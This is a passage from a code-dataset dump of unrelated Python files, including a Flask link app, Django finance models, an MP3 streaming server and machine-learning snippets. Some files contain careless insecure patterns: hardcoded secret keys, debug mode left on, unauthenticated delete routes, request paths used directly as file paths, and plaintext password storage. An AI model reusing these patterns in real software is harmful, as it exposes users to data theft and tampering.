206\r\n\"\"\"\r\nfluido1={'Vazao':0,'T_entr':20,'T_said':30,'cp':4004.0,'k':0.693,'Pr':6.29,'Viscos':9.64*10**-4,'Densidade':1013.4,'Diam_ext':0.0266,'Diam_int':0.02093,'Annulus':0,'Liquido':1,'Viscos_tw':9.64*10**-4};fluido2={'Vazao':3.0,'T_entr':65,'T_said':55,'cp':1902.0,'k':0.1442,'Pr':1050.0,'Viscos':0.075,'Densidade':885.27,'Diam_ext':0,'Diam_int':0.0525,'Annulus':1,'Liquido':1,'Viscos_tw':0.197};material={'K':52,'L':4.5, 'R_fi':0.000176,'R_fo':0.088*10**-3,'Calor_cnste':1,'Contracorrente':1,'Efic_bomb1':0.8,'Efic_bomb2':0.8,'Num_tubs':1,'Alet_per_tube':30,'Alet_alt':0.0127,'Alet_K':52,'Alet_espes':0.9*10**-3,'Alet_type':'retangular','Tubos_Aletado':1}\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"trocador/cascoetubos/metodo_kern.py","file_name":"metodo_kern.py","file_ext":"py","file_size_in_byte":9171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"349294728","text":"from flask import *\nfrom wtforms import Form\nfrom dbconnect import connection\nfrom MySQLdb import escape_string as esc\nimport gc\n\napp = Flask(__name__)\napp.secret_key = 'T\\xa0\\x96W\\x1cZ\\x02\\x81zZ\\xf0\\xbd\\xe1\"+\\x05\\x83\\x1fc\\xde]y>\\xe3'\n\n@app.route('/')\ndef main_page():\n c, conn = connection()\n c.execute(\"SELECT * FROM links\");\n links = c.fetchall()\n c.close()\n conn.close()\n gc.collect()\n return render_template(\"index.html\",links=links)\n\n@app.route('/submit_link', methods=['POST','GET'])\ndef submit_link():\n if request.method == 'POST':\n # database stuff\n c, conn = connection()\n title = request.form['title']\n newlink = request.form['newlink']\n c.execute(\"INSERT INTO links (title,link) VALUES (%s,%s)\",\n (esc(title),esc(newlink)) )\n conn.commit()\n flash(\"Link Submitted!\")\n c.close()\n conn.close()\n gc.collect()\n return redirect(url_for(\"main_page\"))\n else:\n return render_template(\"submit.html\")\n\n@app.route('/delete_link/')\ndef delete(id):\n c, conn = connection()\n c.execute(\"DELETE FROM links where id=%s\",(str(id),))\n conn.commit()\n flash(\"Deleted!\")\n c.close()\n conn.close()\n gc.collect()\n return redirect(url_for(\"main_page\"))\n\nif __name__ == '__main__':\n app.debug=True\n app.run()\n","sub_path":"FlaskApp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"153965623","text":"# Image Processing tools for processing the image files\n\nimport cv2\nimport numpy as np\n\ndef readGreyscaleImage(filename):\n \"\"\"Reads an image file as greyscale and returns it.\"\"\"\n\n return cv2.imread(filename, cv2.CV_LOAD_IMAGE_GRAYSCALE)\n\ndef writeGreyscaleImage(img, filename):\n \"\"\"Writes a greyscale image to a file.\"\"\"\n\n cv2.imwrite(filename, img)\n\ndef binarize(im_gray):\n \"\"\"Returns the binary form of a greyscale image.\"\"\"\n\n (thresh, im_bw) = cv2.threshold(im_gray, 128, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n return im_bw\n\ndef resizeTo100x100(im):\n \"\"\"Resizes the image to 100x100 and returns the resulting image.\"\"\"\n \n return cv2.resize(im, (100, 100))\n\ndef convertToZeroTen(img):\n \"\"\"Returns a zero-ten form of the image with each pixel having a value either 0 or 10.\n\n An assigned value of 0 means that in the binarized image, that pixel was white.\n An assigned value of 10 means that in the binarized image, that pixel was black.\n\n \"\"\"\n\n img_bw = binarize(img)\n height, width = img.shape\n new_img = np.zeros((height, width), 
np.uint8)\n for i in range(height):\n for j in range(width):\n if img_bw[i, j] == 255:\n new_img[i, j] = 0\n else:\n new_img[i, j] = 10\n return new_img\n\ndef scale(img, factor):\n \"\"\"Scales the value of each pixel in a greyscale image by factor and returns the resulting image.\"\"\"\n\n height, width = img.shape\n new_img = np.zeros((height, width), np.uint8)\n for i in range(height):\n for j in range(width):\n new_img[i, j] = img[i, j] * factor\n return new_img\n\ndef createGradientHelper(img_zt, i, j, factor):\n \"\"\"Helper function for createGradient().\"\"\"\n\n height, width = img_zt.shape\n new_factor = factor - 1\n if new_factor > 0:\n if i != 0:\n if img_zt[i - 1, j] != 10:\n img_zt = createGradientHelper(img_zt, i - 1, j, new_factor)\n if j != 0 and img_zt[i - 1, j - 1] != 10:\n img_zt = createGradientHelper(img_zt, i - 1, j - 1, new_factor)\n if j != (width - 1) and img_zt[i - 1, j + 1] != 10:\n img_zt = createGradientHelper(img_zt, i - 1, j + 1, new_factor)\n if i != (height - 1):\n if img_zt[i + 1, j] != 10:\n img_zt = createGradientHelper(img_zt, i + 1, j, new_factor)\n if j != 0 and img_zt[i + 1, j - 1] != 10:\n img_zt = createGradientHelper(img_zt, i + 1, j - 1, new_factor)\n if j != (width - 1) and img_zt[i + 1, j + 1] != 10:\n img_zt = createGradientHelper(img_zt, i + 1, j + 1, new_factor)\n if j!= 0 and img_zt[i, j - 1] != 10:\n img_zt = createGradientHelper(img_zt, i, j - 1, new_factor)\n if j != (width - 1) and img_zt[i, j + 1] != 10:\n img_zt = createGradientHelper(img_zt, i, j + 1, new_factor)\n val = 2 * factor\n if img_zt[i, j] < val:\n img_zt[i, j] = val\n return img_zt\n\ndef createGradient(img_zt):\n \"\"\"Creates a gradient over a zero-ten image and returns it.\"\"\"\n\n height, width = img_zt.shape\n new_img = np.zeros((height, width), np.uint8)\n for i in range(height):\n for j in range(width):\n new_img[i, j] = img_zt[i, j]\n for i in range(height):\n for j in range(width):\n if new_img[i, j] == 10:\n new_img = createGradientHelper(new_img, i, j, 5)\n return new_img\n\ndef getBoundingBox(image):\n \"\"\"Returns limits of the region of interest.\"\"\"\n\n img = binarize(image)\n height, width = img.shape\n topLimit = -1\n bottomLimit = -1\n leftLimit = width + 1\n rightLimit = -1\n for i in range(height):\n for j in range(width):\n if img[i, j] == 0:\n if topLimit == -1:\n topLimit = i\n if bottomLimit < i:\n bottomLimit = i\n if rightLimit < j:\n rightLimit = j\n if leftLimit > j:\n leftLimit = j\n return leftLimit, rightLimit, topLimit, bottomLimit\n\ndef autoCrop(img):\n \"\"\"Autocrops the image and returns it.\"\"\"\n\n left, right, top, bottom = getBoundingBox(img)\n return resizeTo100x100(img[top:bottom, left:right])","sub_path":"components/ip_tools.py","file_name":"ip_tools.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"279225946","text":"# -*- coding: utf-8 -*-\nfrom default_settings import *\n\nimport os\npath = os.path.abspath(os.path.dirname(__file__))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nINTERNAL_IPS = ('127.0.0.1',)\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(path, '../../db.sqlite'),\n }\n}\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nDEFAULT_FROM_EMAIL = 'angelo@ma-work.co.uk'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = u'1234'\n\n\n#INSTALLED_APPS = INSTALLED_APPS + (\n# 
'debug_toolbar',\n#)\n","sub_path":"src/website/local_settings.development.py","file_name":"local_settings.development.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"464465865","text":"import os\n\ntest_env = Environment(CCFLAGS = \"-std=c++11 -D_WEBSOCKETPP_CPP11_STL_ -g\", LINKFLAGS = \"-pthread\", CPPPATH = \"../../src\", LIBPATH = \"../../build\")\n\n# Load environment variables\ntest_env.Replace(**os.environ)\n\nImport(\"lib_log\")\nImport(\"lib_tasks\")\nImport(\"lib_events\")\nImport(\"lib_data\")\n\n# Source section\nsources = Split(\"\"\"\nmain.cpp\nlog/log_tests.cpp\n\"\"\")\n\nTEST_COMMAND = \"$SOURCE | tee $TARGET\"\n\n# Target section\ntests = test_env.Program(\"dawntest\",\n source = sources,\n LIBS = [\n 'dawn-log',\n 'dawn-data',\n 'dawn-events',\n 'dawn-tasks',\n 'gtest'])\nrun_tests = Command(target = \"tests.log\",\n source = tests,\n action = TEST_COMMAND)\n\n# Aliases\ntest_env.Alias(\"tests\", tests)\ntest_env.Alias(\"run-tests\", run_tests)\n\n","sub_path":"tests/src/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"91608709","text":"import torch.nn as nn\n\n\nclass Project(nn.Module):\n def __init__(self):\n super(Project, self).__init__()\n self.conv = nn.Conv1d(1, 2, 3, padding=1)\n self.pool = nn.MaxPool1d(2)\n self.relu = nn.ReLU()\n self.conv1 = nn.Conv1d(2, 4, 2, padding=1)\n self.linear1 = nn.Linear(3 * 4, 8)\n self.linear2 = nn.Linear(8, 4)\n self.linear3 = nn.Linear(4, 2)\n\n def forward(self, input):\n\n x = self.conv(input.view(len(input), 1, 10))\n x = self.pool(x)\n x = self.conv1(x)\n x = self.pool(x)\n x = x.view(-1, 3 * 4)\n x = self.relu(self.linear3(self.relu(self.linear2(self.relu(self.linear1(x))))))\n return x\n","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"137133105","text":"from dataset_preprocessing import preprocessing_pipeline\nimport time\nimport psutil\nimport os\n\ndef get_process_memory():\n process = psutil.Process(os.getpid())\n return process.memory_info().rss\n\ndef track(func):\n def wrapper(*args, **kwargs):\n mem_before = get_process_memory()/1024/1024\n start = time.time()\n result = func(*args, **kwargs)\n elapsed_time = time.time() - start\n mem_after = get_process_memory()/1024/1024\n print(\"{}: memory before: {:,} MB, after: {:,} MB, consumed: {:,} MB; exec time: {}\".format(\n func.__name__,\n mem_before, mem_after, (mem_after - mem_before),\n elapsed_time))\n return result\n return wrapper\n\n@track\ndef pipeline():\n preprocessing_pipeline()\n\nif __name__ == '__main__':\n pipeline() \n ","sub_path":"Project 2/src/paradise/ETL/paradise_pipeline.py","file_name":"paradise_pipeline.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"437656116","text":"#!/usr/bin/env python3\nimport re\nfrom collections import Counter\n\nfrom sklearn.metrics import accuracy_score\n\n\nDEV_DATA = \"lassysmall/nl_lassysmall-ud-dev.conllu\"\nTEST_DATA = \"lassysmall/nl_lassysmall-ud-test.conllu\"\nTRAIN_DATA = \"lassysmall/nl_lassysmall-ud-train.conllu\"\n\nTAG_INDEX = 3\nWORD_INDEX = 1\n\n\ndef main():\n \"\"\"\n Implement a baseline system for your corpus that assigns each word 
its most frequent PoS tag.\n Empty lines and lines starting with a # can be ignored. Also lines starting with a code that\n is not an integer (i.e. 13.1 or 13-14) can be ignored. Data is tab-separated.\n The second column is the word, the fourth column the POS-tag. All other columns can be ignored.\n Collect statistics for the most frequent PoS per word from the *-train.conllu file and compute\n the performance of the baseline method on the *-dev.conllu. Dealing with unknown words requires\n special attention. Report your accuracy for the 2 versions of the baseline: one that has the\n simplemest strategy for handling unknowns and scores for an improved version as suggested in the book.\n\n Returns\n -------\n\n \"\"\"\n with open(TRAIN_DATA, 'r', encoding='utf-8') as F:\n corpus = F.readlines()\n\n with open(DEV_DATA, 'r', encoding='utf-8') as F:\n dev_corpus = F.readlines()\n\n training_data = extract(corpus)\n dev_data = extract(dev_corpus)\n model = train(training_data)\n\n tag_counts = count_tags(training_data)\n # print({k: v for k, v in sorted(tag_counts.items(), key=lambda item: item[1])})\n\n # exit()\n\n target_values, predictions = [], []\n for word, target in dev_data:\n target_values.append(target)\n try:\n predictions.append(model[word])\n except KeyError:\n predictions.append('NOUN')\n\n print(accuracy_score(target_values, predictions))\n\n\ndef extract(corpus):\n \"\"\"Load information from .conllu files.\n\n Parameters\n ----------\n corpus : iterable\n Collection of strings.\n\n Returns\n -------\n mappings : iterable\n Word-tag pairs in an iterable.\n \"\"\"\n mappings = []\n for line in corpus:\n if re.match(r\"^(#)|^([0-9]\\.)\", line) or not line.strip():\n continue\n else:\n row = line.split('\\t')[:4]\n word, tag = row[WORD_INDEX], row[TAG_INDEX]\n mappings.append((word, tag)) # add pair to mappings\n return mappings\n\n\ndef train(training_data):\n \"\"\"Trains the model on a given data set.\n\n Parameters\n ----------\n training_data\n\n Returns\n -------\n\n \"\"\"\n counts = Counter(training_data)\n model = {}\n # sort counts by lowest occurrences, up to most frequent.\n # this allows higher frequencies to overwrite related\n # values in the model\n for pair, _ in counts.most_common()[:-len(counts)-1:-1]:\n word, tag = pair\n model[word] = tag\n\n return model\n\n\ndef count_tags(data):\n \"\"\"Count tags from the data.\n\n Parameters\n ----------\n data : iterable\n List containing tuples, which consist of a word and a POS tag.\n Returns\n -------\n\n \"\"\"\n counts = {}\n for _, tag in data:\n try:\n counts[tag] += 1\n except KeyError:\n counts[tag] = 1\n return counts\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"portfolio1/pos_tagger.py","file_name":"pos_tagger.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"398038662","text":"import time\nimport os\nimport sys\nimport glob\nimport socket\nfrom urllib.parse import unquote\nfrom http.server import HTTPServer\nfrom socketserver import ThreadingMixIn\nfrom http.server import BaseHTTPRequestHandler\n\n\nHOST_NAME = '0.0.0.0'\nPORT_NUMBER = 4444\n\n\ndef get_ip_port():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n s.connect(('10.255.255.255', 1))\n IP = \"Open this link in other computers http://%s:%s\" % (s.getsockname()[0], PORT_NUMBER)\n print(IP)\n return True\n except:\n IP = \"\"\"Can't find your local IP address.\\nUse 'ipconfig' and 'ifconfig' commands in windows and linux, 
respectively.\\nYour local address is something like 192.168.1.105 or 172.16.1.101.\\nAfter finding IP open this link in browser:\\nhttp://ip_address:%s\\nwhere ip_address is your local IP address.\"\"\" % PORT_NUMBER\n print(IP)\n return False\n finally:\n s.close()\n\n\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\n pass\n\n\nclass Server(BaseHTTPRequestHandler):\n\n def do_GET(self):\n if self.path == '/':\n self.handle_index()\n elif self.path.startswith('/static'):\n self.handle_static()\n elif self.path.startswith(fake_path):\n name = self.path[self.path.rindex('/')+1:]\n self.handle_music(unquote(name))\n elif self.path == '/favicon.ico':\n self.handle_favicon()\n\n def handle_favicon(self):\n file_path = 'favicon.ico'\n self.send_response(200)\n self.send_header('Content-type', 'image/vnd.microsoft.icon')\n self.send_header('Content-length', str(os.path.getsize(file_path)))\n self.end_headers()\n\n with open(file_path, 'rb', buffering=0) as file:\n self.wfile.write(file.read())\n\n def handle_music(self, file_name):\n file_path = \"%s/%s\" % (real_path, file_name)\n self.send_response(200)\n self.send_header('Content-type', 'audio/mpeg')\n self.send_header('Content-length', str(os.path.getsize(file_path)))\n self.end_headers()\n\n with open(file_path, 'rb', buffering=-1) as file:\n self.wfile.write(file.read())\n\n def handle_static(self):\n file_path = \"./\"+self.path\n self.send_response(200)\n if self.path.endswith('css'):\n self.send_header('Content-type', 'text/css')\n elif self.path.endswith('js'):\n self.send_header('Content-type', 'text/javascript')\n else:\n self.send_header('Content-type', 'font/woff2')\n self.send_header('Content-length', str(os.path.getsize(file_path)))\n\n self.end_headers()\n\n with open(file_path, 'rb') as file:\n self.wfile.write(bytes(file.read()))\n\n def handle_index(self):\n files = glob.glob1(real_path, \"*.mp3\")\n template = '{{\"title\": \"{1}\", \"file\": \"{0}\"}},'\n result = \"\"\n for file_name in files:\n result += template.format(\"%s/%s\" % (fake_path, file_name), file_name)\n\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n with open('index.html') as index:\n content = index.read().replace('FILES', result)\n self.wfile.write(bytes(content, 'UTF-8'))\n\n def log_message(self, format, *args):\n return\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('usage: server.py /path/to/mp3/folder')\n exit(-1)\n\n real_path = sys.argv[1]\n fake_path = '/mp3'\n\n httpd = ThreadedHTTPServer((HOST_NAME, PORT_NUMBER), Server)\n try:\n print('Listening to http://%s:%s' % (HOST_NAME, PORT_NUMBER))\n if not get_ip_port():\n exit(-1)\n httpd.serve_forever()\n except KeyboardInterrupt:\n print('\\nShutting down server...')\n finally:\n httpd.server_close()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"562869809","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def widthOfBinaryTree(self, root: TreeNode) -> int:\n import collections\n memo=collections.defaultdict(list)\n def search(node,i,p):\n if not node:\n return\n memo[i].append(p)\n search(node.left,i+1,2*p)\n search(node.right,i+1,2*p+1)\n search(root,0,0)\n ans=0\n for item in memo:\n temp=memo[item]\n ans=max(ans,temp[-1]-temp[0]+1)\n 
return ans\n","sub_path":"662.py","file_name":"662.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"62101855","text":"import os\nimport sys\nimport django\n\n\ndef main():\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangoproject.settings')\n django.get_version()\n django.setup()\n from Weblog.models import OpinionPoll, Entry, QueryLogger\n print(Entry.objects.using('default').get(pk=1))\n ql = QueryLogger()\n from django.db import connection\n with connection.execute_wrapper(ql):\n e = Entry.objects.get(pk=1)\n print(e)\n print(ql.queries)\n\n from django.shortcuts import get_list_or_404\n # 返回一个列表而不是querySet对象\n entry1 = get_list_or_404(Entry.objects, pk=1)\n print(entry1)\n\n # print(OpinionPoll.opinionpoll_objects.select_to_db(id=1))\nif __name__ == '__main__':\n main()\n","sub_path":"tt01.py","file_name":"tt01.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"511344109","text":"\"\"\"\nThe Maclaurin series expansion for 1/(1-x) on an interval from -1 < x < 1 is as follows:\n\nWrite Python code which asks for input of a value of x on the interval -1 < x < 1, \nand which computes an approximation to 1/(1-x) using the using the series expansion\nsummation. The summation should be continued until the term to be added to the\nsummation is less than 10^-6 in absolute value. Hint: Note that each term in the\nseries is x raised to a power, including the 1 and x terms: x^0=1 and x^1=x\n\"\"\"\nfrom math import fabs \n\nx = float(input(\"Give me an x value so that -1 < x < 1: \"))\n\nsum = 0\nn = 0\nwhile (fabs(x ** n)) > (10 ** (-6)):\n\tsum += x ** n\n\tn += 1\n\nprint(\"The Maclaurin series expansion for 1/(1-x) where x = \" + str(x) + \" is: \" + str(sum))\n","sub_path":"Midterm_Prep/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"68221497","text":"\"\"\"Models for the FINANCE app\n\nThe finance app allows entering and viewing journal entries.\nThe journal entries link accounts.\nThe views represent the standard accounting views.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.db import models, transaction\nfrom django.db.models import Q\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom doubenfi.utils import *\nfrom doubenfi import conscribo\nfrom doubenfi.settings import APP_PREFIX\nfrom doubenfi.finance.excel import import_excel_2017, import_data_file\n# import doubenfi.finance.excel\nimport sys\nimport copy\nimport json\nimport os\n\nMAX_TEXT_LEN = 200\n\nBALANCE_TYPE = \"balance.type\" # One of the four possible balance types\nBALANCE_SIDE = \"balance.side\" # Either activa or passiva side\nEXPENSE_TYPE = \"expense.type\" # Either bijschrijving or afschrijving\nENTRY_SIDE = \"transaction.side\" # Debet or credit\n\n# ============================= LOCAL CLASSES ======================================\nerrHandle = ErrHandle()\n\nclass FieldChoice(models.Model):\n\n field = models.CharField(max_length=50)\n english_name = models.CharField(max_length=100)\n dutch_name = models.CharField(max_length=100)\n abbr = models.CharField(max_length=20, default='-')\n machine_value = models.IntegerField(help_text=\"The actual numeric value stored in the database. 
Created automatically.\")\n\n def __str__(self):\n return \"{}: {}, {} ({})\".format(\n self.field, self.english_name, self.dutch_name, str(self.machine_value))\n\n class Meta:\n ordering = ['field','machine_value']\n\ndef build_choice_list(field, position=None, subcat=None, maybe_empty=False):\n \"\"\"Create a list of choice-tuples\"\"\"\n\n choice_list = [];\n unique_list = []; # Check for uniqueness\n\n try:\n # check if there are any options at all\n if FieldChoice.objects == None:\n # Take a default list\n choice_list = [('0','-'),('1','N/A')]\n unique_list = [('0','-'),('1','N/A')]\n else:\n if maybe_empty:\n choice_list = [('0','-')]\n for choice in FieldChoice.objects.filter(field__iexact=field):\n # Default\n sEngName = \"\"\n # Any special position??\n if position==None:\n sEngName = choice.english_name\n elif position=='before':\n # We only need to take into account anything before a \":\" sign\n sEngName = choice.english_name.split(':',1)[0]\n elif position=='after':\n if subcat!=None:\n arName = choice.english_name.partition(':')\n if len(arName)>1 and arName[0]==subcat:\n sEngName = arName[2]\n\n # Sanity check\n if sEngName != \"\" and not sEngName in unique_list:\n # Add it to the REAL list\n choice_list.append((str(choice.machine_value),sEngName));\n # Add it to the list that checks for uniqueness\n unique_list.append(sEngName)\n\n choice_list = sorted(choice_list,key=lambda x: x[1]);\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n choice_list = [('0','-'),('1','N/A')];\n\n # Signbank returns: [('0','-'),('1','N/A')] + choice_list\n # We do not use defaults\n return choice_list;\n\ndef build_abbr_list(field, position=None, subcat=None, maybe_empty=False):\n \"\"\"Create a list of choice-tuples\"\"\"\n\n choice_list = [];\n unique_list = []; # Check for uniqueness\n\n try:\n # check if there are any options at all\n if FieldChoice.objects == None:\n # Take a default list\n choice_list = [('0','-'),('1','N/A')]\n unique_list = [('0','-'),('1','N/A')]\n else:\n if maybe_empty:\n choice_list = [('0','-')]\n for choice in FieldChoice.objects.filter(field__iexact=field):\n # Default\n sEngName = \"\"\n # Any special position??\n if position==None:\n sEngName = choice.english_name\n elif position=='before':\n # We only need to take into account anything before a \":\" sign\n sEngName = choice.english_name.split(':',1)[0]\n elif position=='after':\n if subcat!=None:\n arName = choice.english_name.partition(':')\n if len(arName)>1 and arName[0]==subcat:\n sEngName = arName[2]\n\n # Sanity check\n if sEngName != \"\" and not sEngName in unique_list:\n # Add it to the REAL list\n choice_list.append((str(choice.abbr),sEngName));\n # Add it to the list that checks for uniqueness\n unique_list.append(sEngName)\n\n choice_list = sorted(choice_list,key=lambda x: x[1]);\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n choice_list = [('0','-'),('1','N/A')];\n\n # Signbank returns: [('0','-'),('1','N/A')] + choice_list\n # We do not use defaults\n return choice_list;\n\ndef choice_english(field, num):\n \"\"\"Get the english name of the field with the indicated machine_number\"\"\"\n\n try:\n result_list = FieldChoice.objects.filter(field__iexact=field).filter(machine_value=num)\n if (result_list == None):\n return \"(No results for \"+field+\" with number=\"+num\n return result_list[0].english_name\n except:\n return \"(empty)\"\n\ndef choice_value(field, term):\n \"\"\"Get the numerical value of the field with the indicated English name\"\"\"\n\n try:\n 
result_list = FieldChoice.objects.filter(field__iexact=field).filter(english_name__iexact=term)\n if result_list == None:\n # Try looking at abbreviation\n result_list = FieldChoice.objects.filter(field__iexact=field).filter(abbr__iexact=term)\n if result_list == None:\n return -1\n else:\n return result_list[0].machine_value\n except:\n return -1\n\ndef choice_abbreviation(field, num):\n \"\"\"Get the abbreviation of the field with the indicated machine_number\"\"\"\n\n try:\n result_list = FieldChoice.objects.filter(field__iexact=field).filter(machine_value=num)\n if (result_list == None):\n return \"{}_{}\".format(field, num)\n return result_list[0].abbr\n except:\n return \"-\"\n\n\n\n# ============================= MODEL CLASSES ======================================\n\n\nclass Vault(models.Model):\n \"\"\"Store username/password combinations, e.g. for Conscribo\"\"\"\n\n # [1] username\n username = models.CharField(\"Gebruiker\", max_length=MAX_TEXT_LEN)\n # [1] password\n password = models.CharField(\"Wachtwoord\", max_length=MAX_TEXT_LEN)\n # [1] name of the service\n servicename = models.CharField(\"Service\", max_length=MAX_TEXT_LEN)\n # [0-1] API address\n url = models.URLField(\"API url\", blank=True,null=True)\n\n def __str__(self):\n return self.servicename\n\n def get_session_id(self):\n oBack = {'status': 'starting', 'msg': ''}\n if self.servicename.lower() == \"conscribo\" and self.url != None and \"conscribo\" in self.url:\n # Return a session-id request object\n oBack = conscribo.get_session_id(self)\n return oBack\n\n def repair_ong_2017(self, project, session_id):\n \"\"\"Repair ONG 2017\"\"\"\n\n response = {'status': 'error', 'msg': ''}\n oErr = ErrHandle()\n oCount = {'info': '', 'id': '', 'missed': []}\n try:\n count = 0\n missed_list = []\n # Get the ONG account\n ong = project.accounts.filter(number=1210).first()\n # Get a list of all the transactions (expenses) of the ONG\n qs_ong = project.transactions.filter(credit=ong)\n num = qs_ong.count()\n # Walk all the transactions\n for transaction in qs_ong:\n # Prepare: get this transaction from Conscribo\n oTrans = conscribo.repair_ong_expense(self, transaction, session_id)\n if oTrans['status'] == \"ok\":\n # Keep track\n count +=1\n oErr.Status(\"Okay for {} of {}\".format(count, num))\n else:\n # COuld not find this transaction\n missed_list.append(transaction.id)\n\n # Show what we have done:\n oMsg = \"Er zijn {} ONG transacties gecorrigeerd voor dit project\".format(count)\n if len(missed_list)>0:\n oMsg += \"

Gemiste transacties:

\"\n for item in missed_list:\n oMsg += \"
{} - [{}] {}\".format(item.date, item.doc, item.amount) \n response['msg'] = oMsg\n except:\n response['msg'] = oErr.get_error_message()\n return response\n\n\n def sync_persons(self, project, session_id, oStatus, sync_type=\"update\"):\n \"\"\"Try synchronise persons in [project] using the given session id\"\"\"\n\n response = {'status': 'error', 'msg': ''}\n oErr = ErrHandle()\n oCount = {'info': '', 'id': ''}\n transrownum = 1\n\n try:\n # Get a list of new persons\n person_list = project.org.persons.filter(sync='false').order_by('id')\n total = person_list.count()\n\n # If no synchronisation is needed, then we're okay\n if total == 0:\n response['status'] = 'ok'\n else:\n if self.servicename.lower() == \"conscribo\" and self.url != None and \"conscribo\" in self.url:\n # Get a list of persons currently in Conscribo\n oListResponse = conscribo.list_person(self, session_id)\n if 'relations' in oListResponse:\n # We now have a list of persons already in Conscribo\n conscribo_list = oListResponse['relations']\n # Walk all new persons in this project\n count = 0\n # Walk all persons that have not been added yet\n for person in person_list:\n # Double check to see this person is not in conscribo_list\n sIban = person.iban\n lMatches = [v for k,v in conscribo_list.items() if v['rekening']['iban'] == sIban]\n if len(lMatches) == 0:\n oCount['info'] = 'Adding person'\n oCount['id'] = person.id\n oCount['count'] = count+1\n oStatus.set(\"group\", oCount=oCount)\n # Try synchronizing this person\n code = str(person.id)\n oPers = conscribo.sync_person(self, person, code, session_id)\n if oPers['status'] == 'ok':\n # Also set the person sync status here to 'true'\n person.sync = 'true'\n person.save()\n # Keep track of progress\n count += 1\n else:\n # There has been an error\n oCount['info'] = 'Error in person'\n oCount['name'] = \"{}: {}\".format(person.name, person.iban)\n oCount['count'] = count+1\n oStatus.set(\"group\", oCount=oCount)\n else:\n # The person is already known in Conscribo: set the status to okay\n person.sync = \"true\"\n person.save()\n # Finish off nicely\n response['status'] = 'ok'\n response['msg'] = 'From the {} persons, {} have been synchronized'.format(total, count)\n else:\n response['msg'] = \"could not get a list with relations from Conscribo\"\n\n else:\n\n response['msg'] = 'this project has no synchronisation defined in the Vault'\n except:\n response['msg'] = oErr.get_error_message()\n return response\n\n\n def sync_transactions(self, project, session_id, oStatus, sync_type=\"update\"):\n \"\"\"Try synchronise transactions in [project] using the given session id\"\"\"\n\n response = {'status': 'error', 'msg': ''}\n oErr = ErrHandle()\n oCount = {'info': '', 'id': ''}\n transrownum = 1\n try:\n if self.servicename.lower() == \"conscribo\" and self.url != None and \"conscribo\" in self.url:\n\n # First try to synchronize the persons\n oRelationsResponse = self.sync_persons(project, session_id, oStatus, sync_type)\n if oRelationsResponse == None or not 'status' in oRelationsResponse or oRelationsResponse['status'] != 'ok':\n # Something has gone wrong\n if 'msg' in oRelationsResponse:\n response['msg'] = oRelationsResponse['msg']\n return response\n\n # Walk all transactions in this project\n count = 0\n total = 0\n # Get a list of all group numbers in the transactions for this project\n group_list = []\n group = 0\n\n # Determine which transactions to synchronize\n if sync_type == \"all\" or sync_type == \"journal\":\n trans_list = 
project.transactions.all().order_by('group')\n else:\n trans_list = project.transactions.filter(sync='false').order_by('group')\n\n # Divide the transactions into groups\n for transaction in trans_list:\n # every transaction must have a group, so if this one doesn't, make sure it gets one\n if transaction.group == None:\n transaction.group = transaction.id\n transaction.save()\n if transaction.group != group:\n group = transaction.group\n group_list.append(group)\n oCount['info'] = 'Divided transactions into groups'\n oStatus.set(\"groups\", oCount=oCount)\n # Now visit all groups\n for group in group_list:\n oCount['info'] = 'Handling group'\n oCount['id'] = group\n oCount['count'] = count+1\n oStatus.set(\"group\", oCount=oCount)\n # Get the transactions in this group\n trans_list = project.transactions.filter(group=group)\n total += len(trans_list)\n # Try synchronizing this transaction\n oTrans = conscribo.sync_transaction(self, trans_list, session_id, transrownum)\n if oTrans['status'] == 'ok' and 'transrownum' in oTrans:\n count += 1\n transrownum = oTrans['transrownum']\n else:\n # There has been an error\n oCount['info'] = 